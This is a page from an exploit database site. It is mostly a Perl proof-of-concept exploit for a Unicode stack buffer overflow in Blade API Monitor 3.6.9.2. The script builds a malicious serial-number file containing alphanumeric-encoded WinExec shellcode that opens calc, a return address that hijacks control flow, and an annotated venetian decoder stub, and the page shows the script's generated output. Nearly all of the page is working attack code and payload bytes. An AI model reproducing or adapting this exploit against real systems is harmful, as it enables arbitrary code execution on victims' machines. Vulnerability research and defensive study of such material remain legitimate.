0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Blade API Monitor 3.6.9.2 Unicode Stack Buffer Overflow
[# Exploit Title: Blade API Monitor Unicode Stack Buffer Overflow (the serial number!!)
# Date: 25/12/2011
# Author: FullMetalFouad
# Version: 3.6.9.2
# Tested on: Windows XP/7
################################################################
my $file= "bof_blade.txt";
# windows/Winexec - 178 bytes
# VERBOSE=false, EXITFUNC=process, CMD=calc encoder=Alpha3
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\calc.txt" --verbose
my $shellcode_calc =
"hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J".
"0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I".
"2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W".
"0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p".
"034r032m334t3w3m02";
#
# first stage to prepare the $shellcode_calc execution :
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\shellcode.txt" --verbose
# "\x05\xF6\xFC\xFF\xFF" ;# sub eax, 30A
# "\x33\xDB" ;# xor ebx,ebx
# "\x33\xC9" ;# xor ecx,ecx
# "\xFE\xC5" ;# inc ch
#
# "\x43" ;# inc ebx
# "\x8A\x14\x58" ;# mov dl, [eax+ebx*2]
# "\x88\x14\x18" ;# mov [eax+ebx], dl
# "\xE2\xF7" ;# loop
# "\xFF\xE0" ;# jmp eax
my $shellcode = "hffffk4diFkTpk02Tpl0T0Bu".
"EE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0m";
my $junk1 = "\xCC" x 104;
$junk1 = $junk1 ."\x35" x 2; # ECX
$junk1 = $junk1 ."\x41" x 6; # EBP
my $eip = "\x3e\x43"; # 0x0043003e : call ebx | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [BladeAPIMonitor.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.6.9.2 (C:\Program Files\BladeAPIMonitor\BladeAPIMonitor.exe)
my $junk2 = "\x42" x 20;
my $buffer = "\x41" x 246;
my $finder = "";
my $part0 = "";
my $part1 = "";
my $part2 = "";
my $part3 = "";
# 0 part : we do EAX = EBX + length(part0+part1+part2 +1 ), to point to the first null byte of the loop code.
# _part_0_:__________________________________________________
$part0 = $part0. "\x53"; # | 53 push ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xBA\x58\x58"; # | BA00580058 mov edx, 58005800 |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al |
$part0 = $part0. "\x54"; # | 54 push esp |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x5F"; # | 5F pop edi |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xB9\x3B\x3B"; # | B9003B003B mov ecx, 3B003B00 (diff) |
$part0 = $part0. "\xF5"; # | 00F5 add ch,dh |
$part0 = $part0. "\x6F"; # | 006F00 add [edi+0x0],ch |
$part0 = $part0. "\xD6"; # | D6 salc |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x5B"; # | 5B pop ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x50"; # | 50 push eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x54"; # | 54 push esp |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xC1\x19"; # | C10019 rol dword ptr [eax], 19 |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\xC7"; # | 00C7 add bh,al |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x53"; # | 53 push ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x52"; # | 52 push edx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
##################################### |__________________________________________________________|
# 1st part : we do EBX=0x00000000, and ECX=0x00000100 (approximative size of buffer)
# _part_1_:__________________________________________________
$part1 = $part1. "\x6A"; # | 6A00 push dword 0x00000000 |
$part1 = $part1. "\x6A"; # | 6A00 push dword 0x00000000 |
$part1 = $part1. "\x5B"; # | 5B pop ebx |
$part1 = $part1. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part1 = $part1. "\x59"; # | 59 pop ecx |
$part1 = $part1. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part1 = $part1. "\xBA\x01\x41"; # | BA00010041 mov edx,0x41000100 |
$part1 = $part1. "\xF5"; # | 00F5 add ch,dh |
##################################### |__________________________________________________________|
# 2nd part : The patching of the 'loop code' :
# _part_2_:__________________________________________________
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x5A"; # | 5A pop edx |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\x32"; # | C60032 mov byte [eax],0x32 ; 0x8A-0x58 |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh ; 0x58 |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh ; 0x88 dh=58 |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\x14"; # | C60014 mov byte [eax],0x14 ; 0x14 |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\xE2"; # | C600E2 mov byte [eax],0xE2 ; 0xE2 |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
# |__________________________________________________________|
# 3rd part : The loop code (stuffed with nulls of course)
# _part_3_:___________________________________________________
# | ; eax points to our shellcode |
# | ; ebx is 0x00000000 |
# | ; ecx is 0x00000500 (for example) |
# | |
# | label: |
$part3 = $part3. "\x43"; # | 43 inc ebx |
$part3 = $part3. "\x14"; # | 8A1458 mov byte dl,[eax+2*ebx] |
$part3 = $part3. "\x30\x18"; # | 881418 mov byte [eax+ebx],dl |
$part3 = $part3. "\xF7"; # | E2F7 loop label |
# |__________________________________________________________|
$finder = $part0.$part1.$part2.$part3;
open($FILE,">$file");
print $FILE $shellcode_calc.$junk1.$eip.$junk2.$finder.$shellcode."\xFF\xFF\xFF\xFF".$buffer."\x43\x43\x43\x43";
close($FILE);
print "File Created successfully\n";
# output: hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCChffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC
# 0day.today [2024-11-15] #